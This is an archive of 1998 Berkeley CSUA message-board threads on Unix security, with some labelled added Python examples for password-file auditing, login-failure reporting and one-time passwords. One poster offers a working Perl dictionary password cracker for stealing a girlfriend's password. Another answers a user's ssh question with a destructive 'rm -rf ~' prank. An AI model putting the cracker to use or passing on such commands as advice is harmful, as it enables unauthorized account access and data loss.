                              scan easily, even without using DNS.
                                \_ or it's like using shadowed passwords
                                   \_ WTF are you smoking!?  Non shadow-passwd
                                      files are a huge security hole.  Give
                                      any user on your system instant access
                                      to all the poor sops' accounts and files
                                      who can't pick a decent password.
                                        \_ unshadowed passwords aren't the
                                           cause of the security hole, stupid
                                           users are
                                \_ shadowed passwords provide little real
                                   security; it's not difficult to get the
                                   shadow file without root.  -tom
                                   \_ Um, by that logic, it's not hard to get
                                      root, so why bother having any security
                                      at all  --dbushong
                                   \_ Tom, you were the one who suggested
                                      using shadowed passwds and have, until
                                      now, continued to do so on the basis that
                                      it was "more secure" for at least 4 years
                                      now, see CSUA/OCF/XCF Help Session handout
                                      by Tom Holub
                                        \_ I haven't updated that in quite
                                           some time; I haven't taught the
                                           security help session in something
                                           like 3 years.  At the time, I
                                           wasn't aware that programs such as
                                           ftpd can leave large swaths of the
                                           shadow file in core dumps.  -tom
                                \_ That's not the logic.  The logic is that
                                   shadowed passwords provide a false sense
                                   of security.  The security problem with
                                   non-shadowed passwords is having bad
                                   passwords; having shadowed passwords does
                                   little or nothing to alleviate the only
                                   problem it could theoretically solve. -tom
                                        \-i think turning off zone xfers is
                                        basically free to do. of course you
                                        shouldnt rely on it and what is really
                                        the important thing to do is to be able
                                        to see who is asking for one and what
                                        they do right after that. a zone xfer
                                        is a pretty good indicator of certain
                                        types of scans/signatures of certain
                                        tools. --psb
                                        \_ Or just curious network users.
                                           E.g. zone transfer of various
                                           things under http://mit.edu is fun.
                \_ Please define "zone transfer"        -- clueless
                   \_ Simple answer: it's what you get when you run
                        host -l or nslookup ls.  Long answer: Read the
                        BIND book from O'Reilly
1998/9/23-24 [Computer/SW/Security] UID:14655 Activity:high
9/22    Any chance of getting ssh2 installed? not clobber ssh1, but just
        have ssh2 available so that we might be able to access other
        systems, pretty please? I'll do it if you gimme the root passwd!
        \_ You don't need to be root.  Just compile it in your home directory
           and delete the source tree once you're done.  The README tells you
           how to do it.  Or better, put it in some shared directory so
           everyone has access to it.  The only bummer is that you can't get
           the daemon to work without being root.
        \_ What's the diff?
                \_ ssh2 uses the ssh 2.0 protocol which is more secure
                   some ssh2 servers won't accept ssh1 connections
                   \_ does that mean that they won't accept telnet/rlogin
                      sessions since those are less secure.  An ssh2.0
                      only server - that's unheard of.  Stop tabbing so
                        \_ It's what you get if you install sshd2 and don't
                           set it up to call sshd1 to handle old connections.
                           The sshd2 software only knows how to handle ssh 2.0
                           protocol.
                      far to the right.
                      \_ It's not unheard of and it makes great sense. --dim
                        \_ Some cs servers (like torus.cs) only accept ssh
                           & kerberos connections - no normal telnet/rlogin
                           \_ This is a good policy and should be expanded
                              (at least when there are more free
                              implementations of SSH).
           \_ originally, there was a problem with the ssh2 licensing that
              made it okay (without paying for licensing) to say have sshd
              running on a machine if say people were going to login and
              use the machine for homework but not necessarily so for
              machines like restricted access fileservers and nameservers
              that only administrative people needed (or could) log into.
              This may have changed since ssh2 was first released. --jon
              \_ It's still quite far from a free software license.  See
                 /tmp/SSH-LICENSE, if you want all the gory details; there
                 is a project to create a genuinely free replacement. -- schoen
1998/9/22-23 [Computer/SW/Security, Computer/SW/OS/FreeBSD, Computer/SW/Unix] UID:14648 Activity:high
9/22    look what i wrote. have fun cracking your wannabe gf's password!
        \_ and getting kicked off of soda
        \_ This assumes that you have a user readable passwd file.
            \_ or non-shadowed passwd, like soda's
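                        \_ /etc/passwd must be world readable, so the
                           "user readable passwd" implies non shadowed

#!/usr/bin/perl
# Dictionary check of one account's crypt(3) hash read from /etc/passwd.

$twink = $ARGV[0];

open(PASSWD,"/etc/passwd") or die "cannot open /etc/passwd: $!\n";
$found = 0;
# Stop at end of file instead of looping forever when the user is absent.
while ($line = <PASSWD>) {
  ($user,$passwd) = split(/:/,$line);
  if ($twink eq $user) { $found = 1; last; }
}
close(PASSWD);
die "no such user: $twink\n" unless $found;

# Traditional crypt(3): the first two characters of the field are the salt.
$salt = substr($passwd,0,2);
$passwd = substr($passwd,2);

foreach $attempt (`cat /usr/dict/words`) {
  chomp($attempt);
  if($salt.$passwd eq crypt($attempt,$salt)) {
    print "password is: $attempt\n";
    exit(0);
  }
}
print "Unable to crack password\n";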
               \_ soda has a shadowed passwd file.  all 4.4 bsd derivatives
                  have such a mechanism.  most modern unix like os's do.
                  only older's like ultrix, older irix, <= 4.3 bsd derivs
                        \_ even ultrix has shadowed passwds
                           \_ I am not sure if I would call that
                              monstrosity a passwd file, but okay, in that
                              case, I amend my earlier statement to include
                              ultrix and sunos as shadowable --jon
                \_where does soda keep its shadow passwd's?
                        \_ where no one but the people with enough clue
                           to RTFM can find them
        \_ Alec Muffett >> you
        \_ /usr/dict/words is a lame dictionary - real crackers use much
                much larger dictionaries
           \_ Real crackers kidnap the person, tie him/her up, and beat
              the shit out of him/her until (s)he gives you the password
                \_ REAL crackers get root shell...
                   \_ True crackers don't bother with gf's account. They
                      sift through her lingerie drawer for a diary
                      (amongst other items...)
                        \_ CSUA crackers sift through her lingerie drawer
                           and wear it.
                                \_ Free Kevin Mitnick!
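
An added example (not part of the original thread) of the audit the shadowed versus non-shadowed argument above turns on: it reads passwd-format text and reports every account whose password field is something other than a placeholder. The sample file, account names and hash-like strings are constructed placeholders, and the field classification is an assumption based on the traditional 13-character crypt(3) format and the `$id$` modular format.

```python
import re

# Constructed sample; the hash-like strings are placeholders, not real hashes.
SAMPLE_PASSWD = """\
# constructed example file
root:*:0:0:Charlie Root:/root:/bin/csh
alice:x:1001:1001:Alice:/home/alice:/bin/sh
bob:ZZexampleHash:1002:1002:Bob:/home/bob:/bin/sh
carol:$1$constrct$AAAAAAAAAAAAAAAAAAAAAA:1003:1003:Carol:/home/carol:/bin/sh
dave::1004:1004:Dave:/home/dave:/bin/sh
broken-line-without-fields
"""

CRYPT_CHARS = r"[./0-9A-Za-z]"
# Traditional crypt(3): 2 salt characters + 11 hash characters.
DES_CRYPT = re.compile(rf"^{CRYPT_CHARS}{{13}}$")
# Modular crypt formats start with $id$ (for example $1$ for MD5 crypt).
MODULAR = re.compile(r"^\$[0-9a-z]+\$")


def classify(field):
    """Classify the second field of a passwd entry."""
    if field == "":
        return "empty"                      # no password required at all
    if field in ("x", "*") or field[0] in "!*":
        return "placeholder"                # hash lives elsewhere, or account locked
    if DES_CRYPT.match(field):
        return "exposed-des-crypt"
    if MODULAR.match(field):
        return "exposed-modular-crypt"
    return "unrecognised"


def audit(passwd_text):
    """Return (line number, user, finding) for every entry worth a look."""
    findings = []
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            findings.append((lineno, None, "malformed"))
            continue
        kind = classify(fields[1])
        if kind != "placeholder":
            findings.append((lineno, fields[0], kind))
    return findings


if __name__ == "__main__":
    for lineno, user, kind in audit(SAMPLE_PASSWD):
        print(f"line {lineno}: {user or '?'}: {kind}")
```
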
1998/9/4-5 [Computer/SW/Security] UID:14546 Activity:nil
9/4     I'm going to school at MIT now and they make you pay to
        connect to the campus network.  Does Berkeley still provide
        free access?  Also can anyone suggest some good ISPs in the
        Cambridge/Boston area?  Thanks.  -emin
        \_ berkeley's is 642-9600.  you need to get an account first at
           http://www-uclink.berkeley.edu (they combined the forms for homeip and
           email) or you could try to telnet to hip.berkeley.edu.
1998/9/3-7 [Computer/SW/Security] UID:14538 Activity:nil
9/3     I remember on UCTwink, when I logged in, it would tell me how many
        previous unsuccessful login attempts, if any, there were. Is there
        anything similar on CSUA?
        \_ Nope, though they could simulate it using the system logs, or by
           patching login.  But you should be using SSH...  -- SSH h0zer
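
An added example (not from the original thread) of the "simulate it using the system logs" suggestion: it replays authentication log lines and, at each successful login, reports how many failed attempts the account saw since its previous success. The log lines are constructed samples in OpenSSH sshd syslog style, and the function and field names are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in OpenSSH sshd syslog style (not from a real host).
SAMPLE_LOG = """\
Sep  3 08:01:12 host sshd[311]: Accepted password for alice from 192.0.2.10 port 40122 ssh2
Sep  3 09:15:40 host sshd[402]: Failed password for alice from 198.51.100.7 port 51515 ssh2
Sep  3 09:15:44 host sshd[402]: Failed password for alice from 198.51.100.7 port 51515 ssh2
Sep  3 09:16:02 host sshd[409]: Failed password for invalid user admin from 198.51.100.7 port 51520 ssh2
Sep  3 09:20:31 host sshd[415]: Failed password for bob from 203.0.113.5 port 33001 ssh2
Sep  3 09:21:00 host sshd[420]: Accepted publickey for bob from 192.0.2.44 port 40200 ssh2
Sep  3 10:02:19 host sshd[450]: Failed password for alice from 203.0.113.9 port 60000 ssh2
Sep  3 10:30:00 host sshd[470]: Accepted password for alice from 192.0.2.10 port 40310 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (Accepted|Failed) (\S+) for (invalid user )?(\S+) "
    r"from (\S+) port \d+"
)


def replay(log_text):
    """Replay a log and build the notice each user would see at login.

    Returns (notices, still_pending, unknown_accounts):
      notices          - one dict per successful login
      still_pending    - failures not yet shown to the account owner
      unknown_accounts - failure counts for accounts that do not exist
    """
    pending = defaultdict(list)       # user -> [(timestamp, source), ...]
    unknown = defaultdict(int)
    notices = []
    for line in log_text.splitlines():
        match = EVENT.search(line)
        if not match:
            continue
        outcome, _method, invalid, user, source = match.groups()
        stamp = line[:15]             # classic syslog timestamp width
        if outcome == "Failed":
            if invalid:
                # Nobody will ever log in as this name, so no banner can
                # report it; keep it for the administrator instead.
                unknown[user] += 1
            else:
                pending[user].append((stamp, source))
            continue
        failures = pending.pop(user, [])
        notices.append({
            "user": user,
            "login_at": stamp,
            "failed_since_last": len(failures),
            "sources": sorted({src for _, src in failures}),
        })
    return notices, dict(pending), dict(unknown)


if __name__ == "__main__":
    for notice in replay(SAMPLE_LOG)[0]:
        print("{user} at {login_at}: {failed_since_last} failed attempt(s) "
              "since last login {sources}".format(**notice))
```
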
1998/8/26-27 [Computer/SW/Security] UID:14518 Activity:moderate
8/26    ssh 2 now released -jon (usu place, usu way) -jon
        \_ Damnit, i just finished installing the old one on my computer.
           you should have told me sooner.
       \_ local mirror?  And what new features/security holes does it have
          that we should be upgrading it to for?
          \_ I had trouble getting to the ftp site since net to finland
             is a little slow.  It implements the ssh2 protocol which is
             on the IETF standards track.  read comp.security.ssh for
             more info --jon
             \_ I'm sure. So is there a local copy here you're willing to
                share?
        \_ You want to upgrade your client so you can talk to new ssh2 servers,
           but don't want to upgrade your servers until everyone has the new
           client as they don't play nicely with older clients.
        \_ ssh 2 server can serve ssh 1 clients, sort of.  You keep
           sshd1 around, and ssh 2 can call it, if it's configured to.
                --PeterM
1998/8/26 [Computer/SW/Security, Computer/SW/Unix] UID:14511 Activity:high
8/26    "I have a problem with extracting from a .tar file.
        When I archived it,
        \_ Use gnu tar.
        \_ you should finish your question.
                tar xvf foo.tar to extract files
                tar cvf foo.tar foo to archive directory foo into foo.tar
                tar xzvf and czvf will handle tar.gz files.
           \_ I would have finished my sentence, but
                \_ I think the best bet is if you
                        \_ Yeah but that won't work becau"

        \_ Let me complete the part of the question that was deleted by
        someone.
                I unthoughtfully archived from the root directory using
                "tar", but now I am under a different directory system and
                I am not root. So I have trouble extracting from the archived
                file. Could anyone please suggest a solution? Thanks!
                \_ give more details (do you have root access on this new
                   machine? what error msgs are you getting? why are you
                   trying to archive starting at the root directory and
                   untaring it to another machine.  From the info you put
                   above no one can help you and will only make fun of you
                   like the cock sucker below.
                \_ You don't have to be root to untar the damn file.
                   untar it somewhere else.  Wanting to write to the
                   root directory w/o root access is NOT a tar question.
                   But it makes sense that you don't have root access.
                   People w/o a clue shouldn't have root access.
                   \_ He's asking how to untar it somewhere else, you idiot.
                      \_ No, you moron.  He meant root directory on a
                         different system.
1998/8/26-27 [Computer/SW/Security] UID:14510 Activity:kinda low
8/26    How do you get fetchmailrc to retrieve mail from uclink4 using
        ssh?
        \_ how's about "ssh uclink4 -L 9660:uclink4:110 -f" then have fetchmail
           POP to port 9660. -nick
                \_ You're too cool.
           \_ If you don't do "-L 9660:localhost:110" then your traffic
              will still go out on the local uclink4 network unencrypted.
                                                                -randal
1998/8/23-25 [Computer/SW/Languages/C_Cplusplus, Computer/SW/Security] UID:14498 Activity:nil
8/22    The Commission on Campus Computing report is now public.
        You can see it at http://ls.berkeley.edu/coc/report.html.
        Salient points (these are all recommendations--they have not
        been and may not be approved by the Chancellors):
        * Computer ownership should be required for new students starting in
          2000.
          \_ not everyone can afford a computer.
                \_ This is becoming less and less true.  (Read the report.)
                \_ If a computer is made a requirement, students can make it
                   part of their financial aid package.  -tom
        * Network connections should include a monthly charge starting in 1999.
        * All courses should have at least a skeletal web page.
        * All students should have a single account which includes
          disk space and Web access and which stays with them for the
          duration of their time at Cal.
        * IS&T should be moved under Carol Christ, and a new head of
          "Educational Technology" should be created.
                                                -tom
1998/8/21-22 [Computer/SW/Security] UID:14493 Activity:very high
8/21    My supervisor asked that everyone in the office release their
        e-mail password to her.  I don't feel comfortable doing that, and
        was wondering if there is some sort of UCB e-mail policy about
        not releasing passwords that I can quote in response to her request.
        \_ Your boss has no right to require that you give them your
           password.  root has the right to have full access to your
           account but that's a different story.  Don't do it.  Tell him
           shove it up his ass if he forces you to.
                \_ root has the ability, but not necessarily the right, to
                   full access to your account.  (If at a UC or ISP, root
                   is prohibited from reading your e-mail for instance.)
        \_ Just say "NO WAY IN HELL"
           \_ You are F..I..R..E..D!!!! (do I smell million dollar law
              suit?)
        \_ Is it your personal email account or work account?  Either one,
           you have the right not to.  You should ask her her reason for
           knowing password.
                \_ It is my csua account which I also use for work.  What
                   I am looking for is some sort of csua or ucop rule that
                   says I am not obligated to give her my password.
                        \_ CSUA policy forbids you from allowing anyone
                           else to have your password or use your account.
                           If she wants a password to your work e-mail,
                           make her give you a work e-mail account. --root
                           \_ in fact CSUA root will turn your account off
                              should we find that this is the case. --jon
        \_ Employers have a legal right to access to your office workstation
           and business related accounts.  That does not extend outside the
           office.  Forward your mail outside and tell her to shove it.
           If they forbid you from forwarding your mail outside the company,
           be very careful what email you do with your business address.  BIG
           BOSS is WAtching YOU. -ERic
                \_ But the UC/UCB e-mail policy protects the privacy of
                   UC employee e-mail - see
                        http://socrates.berkeley.edu:7015/policy
                        \_ Your *e-mail* is protected, but your *password* is
                           not.  In fact there is a campus policy that
                           your supervisor *must* have all the passwords you
                           use for business purposes (if you're UC staff).
                           They just can't look at it except under the
                           situations outlined in the e-mail and other
                           policies.  -tom
                           \_ No, root never knows what your passwords
                              are. Having passwords stored anywhere on a
                              computer compromises security.  Passwords on
                              /etc/passwd or /etc/shadow are one way
                              encrypted so there's no way to derive
                              the original passwords without a password
                              cracker and a high performance computer.
                                                \_ A 386 is powerful enough
                                                   to crack many passwords.
                                \_ I didn't say root, I said "your
                                   supervisor".  -tom
                   \_ Boy imagine that, UC managers who do not understand
                      or are not aware of UC Policies. --jon
                      btw, if you want a wider discussion, there is also
                      http://ucb.net.discussion.  I am sure some of the more
                      security minded denizens of that newsgroup will have
                      some interesting opinions on this topic.
                  \_ Well it's nice that the UC at least grants some expectation
                      of privacy to employee email.  I'm just pointing out that
                      in the 'real world' of employment, it can be very
                      different. -ERic
        \_ I think she likes you!
          \_ I think so too!!
                \_ She's married and I'm a girl.  Hence, I don't think so.
                        \_ She could be bisexual.
                        \_ How about giving me your password.  I am not married
                           and I am a guy and not gay.
                  \_ which company is this?
1998/7/30 [Computer/SW/Unix, Computer/SW/Security] UID:14416 Activity:very high
7/30    Where the heck is kchang? I need my daily dose of idiocy.
        \_ WHITEY GO HOME
        \_ Oh my god, they killed kchang!  You bastards root!
           \_ Is that what /csua/adm/bin/sorry means?
           \_ Yes...I killed him cuz I was on his watch list.  My
              accomplice helped me cuz he was not on his watch list.
              \_ Sorrying kchang is morally equivalent to slavery and
                 discrimination against the black man!  Just because you
                 lily-white root bastards no longer keep black people in
                 chains and let millions of mexicans across the border every
                 day, you think "nobody can see us discriminating in all these
                 other ways in which we used to discriminate . . . so its okay
                 to sorry kchang because we are being so good and nobody
                 will notice!!!!!!!"  You are wrong!!!!!  I WILL NOTICE!!!!!!
                 \_ I didn't write this; I don't indulge myself in the
                    gratuitous use of exclamation points -(fucker)
                    \_ In this context, the use of additional exclamation
                       points is quite correct.  It emphasizes the mental
                       anguish and suffering of an AGGRIEVED MINORITY!!!!!!
                       WHITEY (root) WILL PAY!!!
        \_ kchang left soda to devote his full attentions to a career in the
           bath-house management industry.
           \_ i.e. he went to take a shower?
        \_ you guys are too sarcastic.
1998/7/29 [Computer/SW/Security] UID:14409 Activity:nil
7/27    Does anyone know why there are two different versions of pgp on
        instructional machines?  There seems to be the version where
        everything is done through the single pgp command and the other
        version that's split up into pgps, pgpe, pgpk, etc..
        \_ PGP 2.6 (as well as 2.3) == pgp
           PGP 5 == pgps, pgpe, pgpk
           \_ where do you get this pgp 5? I thought csua's ftp site was
              supposed to contain the most up-to-date version but they
              only seem to go up to 2.6 (/ftp/pub/cypherpunks/pgp/)
                \_ it's commercialwarez
                   \_ source is still available although many people think
                      PGP is selling out.  Get it from http://www.pgpi.org
                      worldwide, e.g.  cypherpunks FTP is NOT maintained now.
        \_ SWW on the HP's & DEC's is run by the dept. and is stagnant due
                to lack of employees to maintain it.  SWW on the Solaris x86
                machines is maintained by root@cory and is much more up to
                date (making it wildly inconsistent with the other machines).
        \_ Ahh, but I am pushing the sww people to get their stuff more current.
           First on the plate is emacs then a bunch of the gnu utilities. --marc
           \_ Good luck! There simply aren't enough people and PGP sure as hell
              isn't a high priority.  Push all you like.  Into /dev/null.
              Don't waste your time trying to get SWW to do anything, just
              build your own.  -been there, done that
1998/7/27-29 [Computer/SW/Security, Computer/SW/Unix] UID:14400 Activity:high
7/27    One of the instructional computers was found cracked and was
        possibly running a sniffer. Since the machine in question was
        on the 43 net, soda accounts might have been compromised.
        \_ are there political problems w/ turning off rsh telnet and
          so on (in favor of ssh)
          \_ Is that a pretty elitist point of view?  Maybe we should just
             leave rsh/telnet enabled, but force them to use a one-time-use
             password scheme.
          \_ lots of people don't [have] access to ssh.
          \_ SSH does not work well with some corporate firewalls
          \_ A more 3l33t plan would be to unplug soda's net connection, and
             have all interaction with the machine be via hardwired TVI 920
             terminals.  All the terminals would be in the same room as soda
             (to make sure that hackurs from the outside don't splice their
             way into the wiring), and that room would be TEMPEST shielded.
             \_ and what would we use soda for if it had no net connection?
        \_ Don't use telnet.  Don't use telnet.  Don't use telnet.
           (I have said it thrice; what I tell you three times is true.)
                \_...or ftp, or pop3...
           \_ Kerberized telnet?  telnet -x otherhost
                \_ not to soda
           \_ sometimes we have to connect to soda from devices that don't
              support anything BUT telnet. Like routers and access servers.
              We need one-time-passwords  on telnetd. -ERic
        \_ but was the snark a boojum?
           \_ The snark WAS a boojum, you see.
                \_ If your firewall is lame-ass (i.e. run by BBN because
                   some marketroid thought it would be a good idea) and
                   you are forced to use telnet, do what you can to set up
                   one-time passwords via s/key.  There is a free WinBlows
                   one-time password computer available out there (I got
                    my copy from somewhere on ftp.msri.org) and if you want
                   to port it to another UNIX then we have source here on
                   soda.  Doesn't solve all problems, but at least prevents
                   scriptkiddies from grabbing your real password.
                   rtfm on skey(1) for more info.  -- tmonroe
                   \_ Might want to check out OPIE instead of S/Key. --dim
                      \_ urlP
                         \_ ftp://ftp.nrl.navy.mil/pub/security/opie or
                            ftp://ftp.inner.net/pub/opie  --dim
                   \_ One-time passwords are somewhat limited compared to
                      SSH, though, since they don't typically encrypt the
                      contents of your session (thus preventing you from
                      safely typing other passwords from within telnet).
                      Better than nothing, though.
                      \_ The point was not everyone can use ssh.
                      \_ ssh is also much better than telnet for dealing
                         with flaky connections that drop a lot of packets
                         for extended periods of time, if you don't want
                         to lose link.  For some reason.  Can someone
                         explain this?  I'm curious.  -John
                         \_ TCP_KEEPALIVES-- telnet uses them, ssh doesn't.
                            odd that the SO_KEEPALIVE would cause to lose
                            connections in a lossy network, but that's how
                            it works. -ERic
        \_ Since the 43-net runs through public access labs that anyone can
           bring their laptop into and start sniffing, always assume packets
           to soda are being sniffed.
           \_ Why isn't access at the public access labs run on switches?
              Is there a reason to expose the communications "backbone"?
                \_ What's the notation for "current PID" in most shells and
                   Perl?  There's your answer.
                        \_ Geek.  Just say $$.  Sheesh.  Had to be "clever"?
                \_ Switches cost money - the dept's just barely finishing
                    converting Cory Hall - Soda Hall is scheduled to be
                    converted as soon as they figure out who's paying for it.
                    \_ the cost difference between switched and shared is
                        negligible these days.  -tom
                        \_ But they already have shared and already paid.
                           Also, maybe they want to wait for Fast Ethernet?
                \_ Because the university by its nature is always behind.
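
An added example (not from the original thread) of why the one-time passwords recommended above survive a sniffer: a Lamport-style hash chain, the idea S/Key and OPIE build on. This is a simplified sketch using SHA-256, not the real S/Key encoding; the class, function names, seed and passphrase are assumptions for illustration. As the thread notes, it protects only the login secret, not the rest of the session.

```python
import hashlib
import hmac


def step(value: bytes) -> bytes:
    """One link of the chain."""
    return hashlib.sha256(value).digest()


def otp(secret: bytes, seed: bytes, n: int) -> bytes:
    """Client side: hash seed+secret n times to get the password for step n."""
    value = seed + secret
    for _ in range(n):
        value = step(value)
    return value


class Verifier:
    """Server side: stores only the last accepted chain value, never the secret."""

    def __init__(self, seed: bytes, count: int, last: bytes):
        self.seed = seed
        self.count = count        # 'last' equals otp(secret, seed, count)
        self.last = last

    def challenge(self):
        """Tell the client which chain position to send next."""
        return self.count - 1, self.seed

    def verify(self, response: bytes) -> bool:
        if self.count <= 1:
            # Next value would be the unhashed secret material: chain is
            # exhausted and must be re-initialised over a trusted channel.
            return False
        if hmac.compare_digest(step(response), self.last):
            self.last = response  # the sniffed value is now useless
            self.count -= 1
            return True
        return False


def demo():
    """Log in, replay the captured value, then log in again."""
    secret, seed = b"constructed passphrase", b"so12345"   # constructed values
    server = Verifier(seed, 4, otp(secret, seed, 4))

    n, s = server.challenge()
    sniffed = otp(secret, s, n)          # what a sniffer on the wire would see
    first_login = server.verify(sniffed)
    replay = server.verify(sniffed)      # attacker reuses the captured value

    n, s = server.challenge()
    second_login = server.verify(otp(secret, s, n))
    return first_login, replay, second_login, server.count


if __name__ == "__main__":
    print(demo())
```
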
1998/7/25-26 [Computer/SW/Security, Computer/SW/Unix] UID:14393 Activity:nil
7/24    What is the best way to do encrypted FTP? I'd like to do the data
        stream, but I'd settle for the command channel. Anonymous FTP would
        be nice, too. SSL is the only method I've investigated. Ideas? --dim
        \_ SSH port forwarding for this is pretty standard; you might need to
           use passive FTP.  Datafellows is also coming out with an FTP client
           with built-in SSH soon, they say.  If you don't need interactive
           capability, SCP is far better. -- schoen
           \_ Already using SCP, but have need for FTP. Port forwarding as
              described in the SSH FAQ is not an option. I need a more
              transparent solution. Thanks. --dim

   /- Whoa, news from the future!
1998/7/14 [Computer/SW/Security] UID:14328 Activity:high
7/13    http://www.distributed.net/des crack the Data Encryption Standard
        using idle time on your computer, prove it's inadequate.
        \_ get a life.
           \_ Oh SURE . . . you say that now, but wait until 3:30 AM on that
              fine Sunday morning, when the black helicopters hover over your
              house, and the black ropes come out, and zombie Nazi mind-slaves
              (vat-grown by the UN) wearing black body armor rappel down them
              to burst through your front door and kill you and the wife and
              little Timmy, ALL BECAUSE THAT E-MAIL TO GRANDMA FLO AND
              GRANDPA MEL ABOUT LITTLE TIMMY'S SOCCER GAME LAST WEDNESDAY
              used WEAK DES ENCRYPTION . . . don't expect me to cry for you
              _then_.  Bastard.
                \_ We don't work on Sundays.  -Black Mask Man
           \_ Why do you not like announcements of techie stuff?  This IS the
              "Computer Science" Undergraduate Association, is it not?
                \_ "using idle time on your computer [soda]"....
                        \_ soda is not your computer
                                \_ soda is our computer.  keep this stupid
                                   crap off.  It's already well known that
                                   DES is inadequate.  It's been proved.
                                   This is nothing more than a GeekEgo thing.
                   \_ Don't do that, then.
           \_ Think of it this way.  You get $$$ if you personally break
              it.  Of course, people who do CS only for that reason
              deserve to be shot.
              \_ That's not CS, it's CE.
                \_ It's not even CE.  It's running a black-box program on your
                   computer.
              \_ There are other reasons to do it than money: curiosity, politics.
        \_ Is there a Cal team this time?  -- yuen
           \_ Not unless I hear a lot of interest or unless the RC5 teams carry
              over.  Or ask Trey (rhyde@uclink4) if he wants to take it over
              again.  This contest is supposed to end in 9 days; it's not worth
              doing a lot of organizational work for something that's gone a
              week after you start. -- schoen, inheritor of UCB RC5 team contact
1998/7/2-3 [Computer/SW/Security, Computer/SW/Languages/Web] UID:14289 Activity:nil
7/2     Microsoft security flaw. "::$DATA" behind any asp code will
         allow you to read source code.
        \_ So?  What about Microsoft isn't a security flaw?
1998/6/18-23 [Computer/SW/Security] UID:14223 Activity:nil
6/18    http://www.fbi.gov/foipa/ufo.htm -- the truth is out there...
        \_ http://home.att.net/~ixlez/inexufo1a.htm
1998/6/12-16 [Computer/SW/Security] UID:14208 Activity:kinda low
6/11    ssh 1.2.25 installed, to fix the crc checking security hole.
        The update broke hushlogin support; I hacked sshd to fix the
        problem for now (~mconst/pub/ssh/sshd-hushlogin-patch), and
        I'm sending a bug report out soon.  Let me know if anything
        else goes wrong.  --mconst
        \_ so *why* is the patch ifdef'd for only __FreeBSD__ when it looks
           like there's nothing OS dependent in it?? -ERic
           \_ My patch doesn't mention FreeBSD, it was already there -- the
              ssh-1.2.25 login_cap code is all in #ifdef __FreeBSD__ blocks.
              The problem was that under FreeBSD, sshd would ignore .hushlogin
              files and just look at login.conf.
1998/6/4-8 [Computer/SW/Database, Computer/SW/Security, Computer/SW/Languages/Web] UID:14175 Activity:moderate
6/4     Anyone have experience with http://best.com as web host provider? Good?
        Bad? Comparable alternatives?
        \_ Good.  No comparable alternatives.  -tom
        \_ www.best.com/boxes/~indian
        \_ Best experience i've ever had with a web provider. They
                provide competent and beyond-the-call-of-duty technical
                support, FAQs, etc. -appel
                http://www.chaosium.com
                http://www.glorantha.com
           \_ I'm using it for two of my web sites (http://www.theil.com and
              http://www.docmisha.com) and would definitely recommend it to
              other folks.  Haven't had such a good experience with their
              tech support though.   -genie
           \_ I plan on having several CGI scripts. They list a 1000 cgi
              seconds/day. I highly doubt I'll reach that limit, but just
              so I have a reference, what type of program with how many
              uses per day would come close to hitting that quota?
                \_ run your CGI with "time foo.cgi" to see the amount of
                   CPU time it takes.  It's basically a non-issue unless
                   you're grabbing nude pictures out of a database. -tom
                   \_ Though wall-clock time on your system and wall-clock
                      time on their system may be rather different.
                      Is it an issue if you're grabbing pictures of clothed
                      people from a DB? :-)
                      \_ You're not charged for wall-clock time, you're charged
                         for CPU time.  They run boxes very similar to soda,
                         so CPU time here should be comparable.  It is unlikely
                         that you'll get enough hits to matter if you're
                         grabbing pictures of clothed people from a db.  -tom
1998/6/4-11 [Computer/SW/Security] UID:14171 Activity:nil 66%like:14387
6/3     ssh-1.2.23 installed, bugs to mconst.
1998/5/21 [Computer/SW/Security] UID:14119 Activity:very high
5/10    How does the root know what the sniffer logged??!?!?
 Hi.  You are receiving this automated note because of a breakin to one
 of our machines.  The intruder installed a sniffer and began logging
 passwords.

 Your password appeared in those logs.

 Therefore, you should change your password immediately.  (If you use
                                                        \_ and use SSH
 the same password on several machines, don't forget to change it on all
 of them!)
        \_ Because the sniffer logged to disk and root can read the disk.
                DUH!
        \_ Because the sniffer E-mailed the passwords to somebody else, and
           root happened to run across the list one day when they were
           reading everybody's E-mail looking for interesting stuff, silly.
        \_ Because you logged in during the period of time the sniffer was
           active.  It's a good guess that your password was sniffed during
           that time.
        \_ "Appeared in" --> "we have a copy of, and we read".  Not telepathy.
        \_ so why the love affair with ssh? besides telnet,
           aren't the pop3 and ftp ports also vulnerable?
                \_ that's like asking "why the love affair with helmets?
                   aren't other body parts still vulnerable?" - protecting
                   the most important/used parts is better than going
                   completely unprotected
           \_ Yes, of course.  That's why SSH supports port redirection, so
              that you can securely use unencrypted services.  See the man
              page for ssh, options "-L" and "-R".  SSH is more than just a
              telnet replacement...
           \_ Don't use pop3 and use scp where you'd use ftp (although ssh
              can encrypt ftp's authentication). --dim
                \_ Huh?
                   \_ What's so hard about "don't use pop" or "use scp instead
                        of ftp"?
        \_ It's super cool sysadmin magic.
        \_ cuz root *is* the sniffer!
          \_ no, root is the Kwisatz Haderach.
1998/5/12-13 [Computer/SW/Unix, Computer/SW/Security, Academia/Berkeley/CSUA] UID:14090 Activity:low
5/12    As long as all these new jobs are getting announced in /csua/pub/jobs,
        a small request for people to please CLEAN OUT all the old jobs that
        are no longer relevant.  A number of postings there are owned by root
        because they were moved around.  Those responsible for them, please
        let me know if they are still relevant or can be deleted.       -lila
        \_ Princess Lila made a demand!  All must comply.
          \_ "small request".
          \_ Ohhh. Ahh.
1998/5/6 [Computer/SW/Security, Computer/SW/Unix] UID:14055 Activity:low
5/5     From the MOTD on http://socrates.berkeley.edu:
        >On June 1, 1998 Communication and Network Services (CNS) will be
        >enhancing the Web access to the Campus Directories. At that time,
        >we will discontinue platform-specific Directory Services, such as
        >Unix fspb and Macintosh HyperPB, and gopher and telnet access to
        >Infocal.  This will not affect telnet/host presenter access to
        >Socrates,
        >
        >If you have any questions, please send e-mail
        >to cpadmin@profile.berkeley.edu.
         \_Who cares?
           \_ _I_ care, dammit.  Platform-specific directory users,
              I feel your pain . . .
1998/4/17-18 [Computer/SW/Security, Computer/SW/Unix] UID:13980 Activity:high
4/17    If I want to use ssh to connect to a remote machine and run xwin
        apps, what is the command line to start, say, xterm.  And what do I
        need to set up beforehand?  -emarkp
        \_ unix: /bin/rm -rf ~
           windoze: fdisk
           mac: drag all your icons to the trash can.  empty trash can.
           \_ Um, I assume this is a comment about the security?  I thought
              ssh was a secure way to transmit x-events.  Furthermore, this
              does not answer the question.  -emarkp
              \_ someone buy this man a clue
        \_  with a properly configured ssh, it's all hidden 'silently' from
